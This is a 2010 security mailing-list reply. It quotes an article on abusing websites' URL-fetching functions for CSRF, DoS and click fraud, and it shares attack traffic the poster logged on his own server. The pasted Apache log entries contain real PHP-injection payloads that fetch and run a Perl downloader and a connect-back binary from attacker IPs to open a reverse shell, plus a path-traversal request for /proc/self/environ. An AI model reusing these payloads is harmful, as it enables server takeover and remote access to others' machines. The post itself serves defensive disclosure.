Re: Using of the sites for attacks on other sites

[mrx <mrx () propergander org uk>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 28/06/2010 21:13, MustLive wrote:
> Hello participants of Full-Disclosure!
>
> For last two months I didn't post my articles to this list due to some not
> serious moaning in April on some of my articles (you always can find my
> articles at my site and in WASC Mailing List). But at the end of June I
> decided to remind you about my last articles.
>
> Recently I wrote new article Using of the sites for attacks on other sites
> (http://websecurity.com.ua/4322/). This is brief English version of it.
>
> Last year in article DoS attacks via Abuse of Functionality vulnerabilities
> (it was mentioned at
> http://jeremiahgrossman.blogspot.com/2010/01/top-ten-web-hacking-techniques-of-2009.html)
> I told about possibility of conducting of DoS attacks via Abuse of
> Functionality vulnerabilities at other sites. Particularly I showed examples
> of such vulnerabilities at web sites regex.info and www.slideshare.net.
> These attacks can be as unidirectional DoS, as bidirectional DoS, depending
> on capacities of both servers.
>
> And now I'll tell you about possibility of conducting of CSRF attacks on
> other sites via Abuse of Functionality vulnerabilities. Researching of such
> attacks I begun already at 2007 when found such vulnerability at regex.info.
>
> Using of Abuse of Functionality for attacks on other sites.
>
> Sites, which allow to make requests to other web sites (to arbitrary web
> pages), have Abuse of Functionality vulnerability and can be used for
> conducting of CSRF attacks on other sites. Including DoS attacks via Abuse
> of Functionality, as it was mentioned above. CSRF attacks can be made only
> to those pages, which don't require authorization.
>
> For these attacks it's possible to use as Abuse of Functionality
> vulnerabilities (similar to mentioned in this article), as Remote File
> Include vulnerabilities (like in PHP applications) - it's Abuse of
> Functionality via RFI.
>
> This attack method can be of use when it's needed to conduct invisible CSRF
> attack on other site (to not show yourself), for conducting of DoS and DDoS
> attacks and for conducting of other attacks, particularly for making
> different actions which need to be made from different IP. For example, at
> online voting, for turning of hits of counters and hits of advertising at
> the site, and also for turning of clicks (click fraud).
>
> Abuse of Functionality:
>
> Attack is going at request of one site (http://site) to another
> (http://another_site) at using of appropriate function of the site
> (http://site/script).
>
> http://site/script?url=http://another_site
>
> Advantages of this attack method.
>
> In this part of the article I wrote a list of advantages of this attack
> method. And I mentioned another two important paragraphs:
>
> Note, that this DoS attack is possible to use for attacks on redirectors,
> which I wrote about in my articles Redirector’s hell and Hellfire for
> redirectors.
>
> Also at conducting of DoS attacks it's possible to use several such servers
> at once and so to conduct DDoS attack. In such case these servers will be
> appearing as zombie-computers. I.e. botnet will be made from not home
> computers, but from web servers (which can have larger capacities and faster
> connections). So these vulnerabilities can lead to appearing of new class of
> botnets (with zombie-servers).
>
> Examples of vulnerable web sites and web services.
>
> In this part of the article I showed examples of different web sites and web
> services which could be used for conducting of attacks on other sites.
> Including regex.info, www.slideshare.net, anonymouse.org, www.google.com,
> translate.google.com, babelfish.altavista.com, babelfish.yahoo.com,
> keepvid.com, web application Firebook, W3C validators and iGoogle.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua



I have been witnessing such attacks in the past few weeks. Most of the urls are trying to exploit components of web 
software that I do not have
installed. Some do GET existing pages such as index.php and tag the attack on the end. Such attacks began about 2 weeks 
ago. These attacks have
so far come from three different IP addresses. and I was getting around a dozen such accesses every other day. I think 
my server is pretty
secure, but I am a novice so what do I really know? And as such I have blocked these IP's from accessing my server.

If anyone is interested here are two such attacks. I have disabled the links:

<apache2 log entry>

88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET
/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=hxxp://212.154.190.140/back.txt?? hxxp/1.1" 
404 220 "-"
"<?system('cd /var/tmp;wget hxxp://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget 
hxxp://212.154.190.140/cback;chmod +x cback;./cback
192.24.5.30 80;cd /dev/shm;curl -O hxxp://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O 
hxxp://212.154.190.140/cback;chmod +x
cback;./cback 192.24.5.30 80');?>;<?exec_shell('cd /var/tmp;wget hxxp://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 
80;wget
hxxp://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O 
hxxp://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30
80;curl -O hxxp://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?>;<?passthru('cd /var/tmp;wget
hxxp://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget hxxp://212.154.190.140/cback;chmod +x cback;./cback 
192.24.5.30 80;cd
/dev/shm;curl -O hxxp://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O hxxp://212.154.190.140/cback;chmod +x 
cback;./cback
192.24.5.30 80');?> ; Ustupid MF is Back ; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Here is another example:

94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET
/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ hxxp/1.1" 200 3775 "-" 
"<?system('cd /var/tmp;wget
hxxp://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget hxxp://195.239.120.69/cback;chmod +x cback;./cback 
192.24.5.30 80;cd /dev/shm;curl
- -O hxxp://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O hxxp://195.239.120.69/cback;chmod +x cback;./cback 
192.24.5.30 80');?>
;<?exec_shell('cd /var/tmp;wget hxxp://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget 
hxxp://195.239.120.69/cback;chmod +x cback;./cback
192.24.5.30 80;cd /dev/shm;curl -O hxxp://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O 
hxxp://195.239.120.69/cback;chmod +x
cback;./cback 192.24.5.30 80');?> ;<?passthru('cd /var/tmp;wget hxxp://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 
80;wget
hxxp://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O hxxp://195.239.120.69/cb.txt;perl 
cb.txt 192.24.5.30
80;curl -O hxxp://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0 
(compatible; MSIE 6.0; Windows
98)"

</apache2 log entries>

cb.txt is a perl downloader and classed as a virus, as I discovered when I posted the full script.. ooops.

If anyone would like more log entries let me know.

regards
Dave

- -- 
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTCr1VrIvn8UFHWSmAQLypwgAhvXYTpnRlMp1c7y2vCz6yJyFDxU0/wgQ
Unpz1he/VUsh6NaQv7001n2V25nSRRWACp1OtK2WOaRB9nms6OrRAH5t00PLo50S
t+hgNTgYO3zD0Gm6xusBSBxmHGgABMpV9EBhQoNuXsL8y6sJ3QhV7WFTykDyzM4D
c1cg2Cgng3PRgEkbqXuJTJPpCVvl5BMKiURPrVTVJtXkA/r7Es9Ikd8EER4ek2Ej
gRCDe9moftP8Eo1f/glrC1g0M3kjWwhakA8qbbt7re5p0IAJIzvtkPJzzAsxm+LK
NlSO6fGo1quKqS+mYjO9O49qrameiiC6wBSQhhrub48U7np2Je5bdw==
=LDvM
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/